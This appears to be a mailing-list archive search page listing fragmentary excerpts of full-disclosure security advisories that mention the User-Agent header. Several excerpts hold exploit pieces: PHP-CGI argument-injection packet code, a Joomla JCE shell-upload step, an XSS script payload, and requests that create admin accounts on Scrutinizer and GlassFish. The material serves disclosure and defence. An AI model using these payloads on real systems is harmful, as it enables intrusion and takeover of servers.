User/Agent

RE: [Full-disclosure] Fwd: Websense 6.3.1 Filtering Bypass

EXPOSURE: Web Filtering Bypass

SYNOPSIS
========

By spoofing the User-Agent header it is possible to bypass filtering and,
to a lesser extent, monitoring in a Websense Enterprise 6.3.1 environment.

PROOF OF CONCEPT

Fwd: Websense 6.3.1 Filtering Bypass

EXPOSURE: Web Filtering Bypass

SYNOPSIS
========

By spoofing the User-Agent header it is possible to bypass filtering and,
to a lesser extent, monitoring in a Websense Enterprise 6.3.1 environment.

PROOF OF CONCEPT
================


SQL Injection and XSS vulnerabilities in CubeCart version 4.3.3

Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294;
ccUser=7c970bfe00c50261d25166dbab43c294
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)

2. Cross-site Scripting vulnerability in
“/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “amount”.


[Exploit] Invision Power Board <= 2.3.5 Multiple Vulnerabilities

        else
            $this->msg('Ok, using IP '.$this->s_ip, 1);
    }
}

# User-Agent filter ?
if( $this->conf['browser'] === '1' && !$this->s_admin )
{
    $this->s_bypass = true;

    $this->msg('Trying to find a valid user-agent', 0);

TWSL2012-002: Multiple Vulnerabilities in WordPress

Request #1
----------
POST /wp-admin/setup-config.php?step=2 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive

Squid Analysis Report Generator <= 2.2.3.1 buffer overflow

--------------
Vulnerability:
--------------

Execution of arbitrary code is possible by executing sarg with
specially crafted squid log files (access and useragent log).

The access.log has to be manually created to trigger the exploit,
as squid will not allow malformed HTTP methods.

The useragent log is more critical, as this vulnerability can be

Recon 2012 - Call For Papers - June 14-16, 2012 - Montreal, Quebec

        (Authenticated sender: hfortier) by mail.recon.cx (Postfix) 
        with ESMTPSA id 24588D6170
Message-ID: <4F0C8FE0.4000508@recon.cx>
Date: Tue, 10 Jan 2012 14:22:08 -0500
From: Hugo Fortier <hfortier@recon.cx>
User-Agent: Unknown
MIME-Version: 1.0
To: "info@recon.cx" <info@recon.cx>
Subject: Yo
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit

TWSL2012-008: Multiple Vulnerabilities in Scrutinizer NetFlow & sFlow Analyzer

"trustwave" to the administrative user group.

#Request
GET /cgi-bin/userprefs.cgi?newUser=trustwave&pwd=trustwave&selectedUserGroup=1&= HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18 ( .NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115

Related POC for JCE Joomla Extension <=2.0.10 Multiple Vulnerabilities

/* Packet 1 --> Checking Exploitability */
$packet  = "GET ".$p."/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "User-Agent: BOT/0.1 (BOT for JCE) \r\n\r\n\r\n\r\n";

sendpacket($packet,1,0,1);

/* Packet 2 --> Uploading shell as a gif file */


CubeCart 4 Session Management Bypass

dumping the database, install modules (PHP code execution) and so on.

CubeCart is using a MySQL table named CubeCart_admin_users for storing
information about administrative users.
When an administrator logs in, the applications stores his session ID,
browser (user agent) and IP address in the sessId, browser and sessIP
fields.
> SELECT adminId, username, sessId, browser, sessIp FROM CubeCart_admin_users C;
1, 'admin', '9a58f70e7ded1bcb568b02815a1c4a56', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko)

RunCMS XSS Vulnerability via User Agent

Title: RunCMS XSS Vulnerability via User Agent
Vendor: RunCMS
Product: RunCMS
Tested Version: 2.1
Threat Class: XSS
Severity: Medium
Remote: yes
Local: no
Discovered By: Andrei Rimsa Alvares

Denial of Service using Partial GET Request in Mozilla Firefox 3.06

Tested on:
Windows Vista Version Service Pack 1 Build 6001
Processor Intel(R) Core(TM)2 Duo CPU T8300 @ 2.40GHz,
2401 Mhz, 2 Core(s), 2 Logical Processor(s)

User Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (.NET CLR 3.5.30729)
============================================================

============================================================

PHP CGI Argument Injection Remote Exploit V0.3 - PHP Version

?>";
    $packet  = "POST ".$p."/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1\r\n";
    $packet .= "Host: ".$host."\r\n";
    $packet .= "User-Agent: PHP CGI Argument Injection Exploiter\r\n";
    $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $packet .= "Content-Length: ".strlen($payload)."\r\n\r\n";
    $packet .= $payload."\r\n\r\n\r\n\r\n";
    sendpacket($packet,1,0,0);


Re: Denial of Service using Partial GET Request in Mozilla Firefox 3.06

> Tested on:
> Windows Vista Version Service Pack 1 Build 6001
> Processor Intel(R) Core(TM)2 Duo CPU T8300 @ 2.40GHz,
> 2401 Mhz, 2 Core(s), 2 Logical Processor(s)
>
> User Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US;
> rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6
> (.NET CLR 3.5.30729)
> ============================================================

This is the Firefox user agent string...

eyeOS checksum prediction

3. 

POST /index.php?checknum=876029936871&msg=doLogin HTTP/1.1 (!)
Host: demo.eyeos.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300

Re: RunCMS XSS Vulnerability via User Agent

Html tags were removed from the advisory during the submission process. Hopefully the following advisory will correct this.



Title: RunCMS XSS Vulnerability via User Agent
Vendor: RunCMS
Product: RunCMS
Tested Version: 2.1
Threat Class: XSS
Severity: Medium

PR07-44: XSS on RSA Authentication Agent login page

COMPLETE HTTP REQUEST for simple XSS PoC:

GET /WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Ca%20b=%22 HTTP/1.1
User-Agent: curl/7.15.4 (i486-pc-linux-gnu) libcurl/7.15.4 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.3
Host: target-domain.foo
Accept: */*



Security problems in Zenphoto version 1.3

Acunetix-Aspect: enabled
Cookie: PHPSESSID=fb161d1fe8597f17394ce4e39759840e; setup_test_cookie=5479
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)


2. Cross-site Scripting vulnerability in
“/zenphoto_1_3/zp-core/admin.php”, parameter “from”.

[ MDVSA-2008:079 ] - Updated sarg packages fix multiple vulnerabilities

Problem Description:

A stack-based buffer overflow in sarg (Squid Analysis Report Generator)
allowed remote attackers to execute arbitrary code via a long Squid
proxy server User-Agent header (CVE-2008-1167).

A cross-site scripting vulnerability in sarg version 2.x prior to
2.2.5 allowed remote attackers to inject arbitrary web script or
HTML via the User-Agent header, which is not properly handled when
displaying the Squid proxy log (CVE-2008-1168).

[Suspected Spam]Directory Traversal in Axigen v7.4.1 running on Windows

Cookie: webmailSession=0; cookieTest=cookiesEnabled; checkOverQuota=0;
passwordExpireWarning=0
Host: 192.168.0.222:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

While investigating this alert, I've discovered that this vulnerability
is more serious than I initially expected. This is a very serious
vulnerability because using information from the log files it's possible
to gather enough information to read the file containing all the emails

SQL Injection vulnerabilities in Subdreamer CMS

Vulnerability description:


There are vulnerabilities in two integration modules in Subdreamer. Both Invision Power Board 2 and phpBB3 integration modules have this vulnerability.

Both bulletin board systems store browser user-agent string in the sessions table used to track currently logged in users.

The user-agent string is passed as-is from HTTP headers without any validation / escaping. This opens up a possibility for SQL Injection attacks.


Possible exploits:

[InterN0T] AMember 3.1.7 - Multiple Vulnerabilities

    $register_globals = (bool) ini_get('register_gobals');
    if ($register_globals) $ip = getenv('REMOTE_ADDR');
    else $ip = GetIP();

    $rem_port = $_SERVER['REMOTE_PORT'];
    $user_agent = $_SERVER['HTTP_USER_AGENT'];
    $rqst_method = $_SERVER['METHOD'];
    $rem_host = $_SERVER['REMOTE_HOST'];
    $referer = $_SERVER['HTTP_REFERER'];
    $date=date ("l dS of F Y h:i:s A");
    $log=fopen("$ipLog", "a+");

[DSECRG-08-015] Multiple Security Vulnerabilities in Dokeos 1.8.4

POST /dokeos/main/create_course/add_course.php HTTP/1.0
Cookie: dk_sid=av68g9lus300ts870iqebhneh5
Content-Length: 107
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: localhost
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/dokeos/main/create_course/add_course.php

title=1234&category_code=PROJ&wanted_code=1234&course_language=slovenian&_qf__add_course=&

[MajorSecurity Advisory #65]Motorola Milestone Smartphone Denial of Service

Discovered by: David Vieira-Kurz
http://www.majorsecurity.info

Affected Products:
============
Motorola Milestone (Droid) smartphone browser with the following user agent:
Mozilla/5.0 (Linux; U; Android 2.0; de-de; Milestone Build/SHOLS_U2_01.03.1) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17

Original Advisory:
============
http://www.majorsecurity.info/index_2.php?adv=major_rls65

NGS00106 Technical Advisory: Increased exploitation of Oracle GlassFish Server Administration Console Remote Authentication Bypass Vulnerability

There is a known authentication bypass in Glassfish, by using a TRACE method rather than a GET method it is possible to access data meant only for Glassfish administrators.
The following requests were used to create a new Glassfish administrator:

TRACE /common/security/realms/manageUserNew.jsf?name=admin-realm&configName=server-config&bare=true HTTP/1.1
Host: 10.65.78.211:4848
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101Firefox/6.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive

Re: New Paper: More than 600 million users surf at high risk

>
> A reply from Robert Hensing at Microsoft
> (http://blogs.technet.com/robert_hensing/archive/2008/07/01/vulnerable-w
> eb-browser-study-full-of-fail.aspx) says that your study did not include
> minor version information for Internet Explorer, probably because such
> information is not reported in the user-agent string. But fully-patched
> copies of IE5 and IE6 are not insecure in the same way as an unsupported
> version; Microsoft is still supporting them.
>
> So is it true that your study calls anyone running IE7 secure, and
> anyone running IE5 or IE6 insecure, regardless of their patch levels?

Security Advisory for Bugzilla 3.0, 2.22.1, and 2.20.4

- -------
Class:       Cross-Site Scripting
Versions:    2.17.1 and above
Description: Bugzilla does not properly escape the 'buildid' field in
             the guided form when filing bugs. From 2.17.1 till 2.23.3,
             this field was based exclusively on the User-Agent string
             returned by your web browser. Since 2.23.4, this parameter
             can be defined in the URL passed to enter_bug.cgi,
             overwriting the User-Agent string and may lead to cross-site scripting.
             The guided form is not usually used by Bugzilla
             installations, as it is shipped only as an example to be modified for


Copyright © 1995-2012 LinuxRocket.net. All rights reserved.
